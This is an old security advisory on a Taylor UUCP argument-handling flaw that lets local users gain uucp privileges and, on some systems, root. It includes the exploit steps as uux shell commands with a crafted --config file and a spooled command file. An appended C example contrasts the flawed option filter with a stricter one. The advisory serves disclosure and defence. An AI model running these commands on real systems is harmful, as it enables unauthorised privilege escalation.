Multiple vendor 'Taylor UUCP' problems.

From: zen-parse (zen-parseat_private)
Date: Sat Sep 08 2001 - 03:58:39 PDT

    ******************* Brief description *************
    
      Due to incorrect argument handling in a component of the
      Taylor UUCP package, it is possible for local users to
      gain uid/gid uucp.
    
      This may allow further elevation, depending on the system,
      up to and including root access.
    
      On OpenBSD 2.8 (and probably others) it allows root compromise.
      By overwriting the uucp-owned program /usr/bin/uustat, arbitrary
      commands may be executed as part of the /etc/daily crontab script.
    
      On Red Hat 7.0 (and probably others) it allows creation of empty
      files as root, and the ability to execute commands as if logged
      in at the console (as checked via /lib/security/pam_console.so).
      This may also allow further elevation of privileges, or denial of
      service. (Tested against uucp-1.06.1-25)
    
      Other systems running this package are also affected to
      a greater or lesser degree.
    
    *********************** Solution ******************
    
    Patches should be available very soon, if not already, for most
    affected systems.
    
    If you do not require uucp functionality, you should remove the
    uucp packages from your system.
    
    ********************** The Programs ***************
    
    uux                  (1)  - Remote command execution over UUCP
      If you specify an alternative configuration, it will run as the user
      that called it, and pass the same configuration to uuxqt.
    
    uuxqt                (1)  - UUCP execution daemon
      Defaults to allowing rmail and uucp to be run, and nothing else,
      unless the configuration it is invoked with allows it to run other
      commands.
    
    uucp                 (1)  - Unix to Unix copy
      If you specify an alternate configuration, it will also run as the user
      that called it.
    
      uuxqt checks the arguments for the programs it is asked to execute
      and gets rid of what it thinks are the potentially dangerous ones.
      However, it does not remove long-form arguments (such as --config=...).
    
    ******************** The Exploit ******************
    
    uux 'uucp -I/tmp/vv.v /tmp/somefile /tmp/someotherfile'
    
    will execute uucp, but will not use the /tmp/vv.v configuration file.
    
    However,
    
    uux 'uucp --config=/tmp/vv.v /tmp/somefile /tmp/someotherfile'
    
    will use the supplied configuration, without dropping privileges.
    
    1) Make a configuration file that allows any command to be executed, and
       allows files from anywhere to be copied to anywhere that is writable
       by uid/gid uucp. ( /tmp/config.uucp )
    2) Make a command file with the command you want to be executed.
       ( /tmp/commands.uucp )
    3) Do something like the following:
    
    $ THISHOST=`uuname -l`
    $ WHEREYOUWANTIT=/var/spool/uucp/${THISHOST}/X./X.${THISHOST}X1337
    $ uux 'uucp --config=/tmp/config.uucp /tmp/commands.uucp '${WHEREYOUWANTIT}
    
    The commands in /tmp/commands.uucp file will be executed by uuxqt, with
    the uid/gid of uucp.
    
    If you want to perform an exploit, and don't know what to put in the
    files, you should read the documentation for uucp.
    
    (Proof of concept root exploit for OpenBSD was performed on the wargame
    running OpenBSD 2.8 at damageinc.tv [ http://damageinc.tv ] )
    
    -- zen-parse
    
    ===========================================================================
        http://mp3.com/cosv = Because %49%74%27%73%20%67%6f%6f%64%2e
         'gone platinum'    = Buy the CD that %74%6f%6f%6b%20%61%67%65%73
                            = and %73%6f%75%6e%64%73%20%6f%6b
    ===========================================================================
    
    -------------------------------------------------------------------------
    The preceding information is confidential and may not be redistributed
    without explicit permission. Legal action may be taken to enforce this.
    If this message was posted by zen-parseat_private to a public forum it may
    be redistributed as long as these conditions remain attached. If you are
    mum or dad, this probably doesn't apply to you.
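
An added example, not part of the original advisory and not Taylor UUCP source code: a C model of the argument check described under "The Programs", next to a stricter check that fails closed. The function names and sample paths are assumptions; the weak check is modelled only on the behaviour the advisory reports (-I is neutralised, --config= is passed through).

```c
#include <stdio.h>
#include <string.h>

/* Model of the flawed check (assumption): only the short option -I is
   treated as a configuration override. */
int weak_rejects(const char *arg)
{
    return strncmp(arg, "-I", 2) == 0;
}

/* Stricter check: refuse every spelling an option parser could accept. */
int strict_rejects(const char *arg)
{
    if (arg[0] != '-' || arg[1] == '\0')
        return 0;                 /* plain operand, or "-" on its own */
    if (arg[1] == '-')
        return arg[2] != '\0';    /* any --long option; GNU getopt_long()
                                     also accepts unambiguous abbreviations,
                                     so matching "--config" alone is not enough */
    return strchr(arg + 1, 'I') != NULL;  /* -I, or I bundled after other
                                             short flags (may over-reject) */
}

/* Count the arguments of a requested command that a check would refuse. */
int count_rejected(int (*check)(const char *), const char *const *argv, int argc)
{
    int i, n = 0;
    for (i = 0; i < argc; i++) {
        if (strcmp(argv[i], "--") == 0)
            break;                /* everything after "--" is an operand */
        n += check(argv[i]);
    }
    return n;
}

int main(void)
{
    /* Constructed sample arguments; the paths are placeholders. */
    const char *const samples[] = {
        "-I/tmp/example.conf", "--config=/tmp/example.conf",
        "--conf=/tmp/example.conf", "/tmp/somefile",
    };
    int i;
    for (i = 0; i < 4; i++)
        printf("%-28s weak=%d strict=%d\n", samples[i],
               weak_rejects(samples[i]), strict_rejects(samples[i]));
    printf("refused: weak=%d strict=%d\n",
           count_rejected(weak_rejects, samples, 4),
           count_rejected(strict_rejects, samples, 4));
    return 0;
}
```

A denylist like this only narrows the gap; dropping privileges before honouring any caller-supplied configuration removes the dependency on the filter being complete.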
    


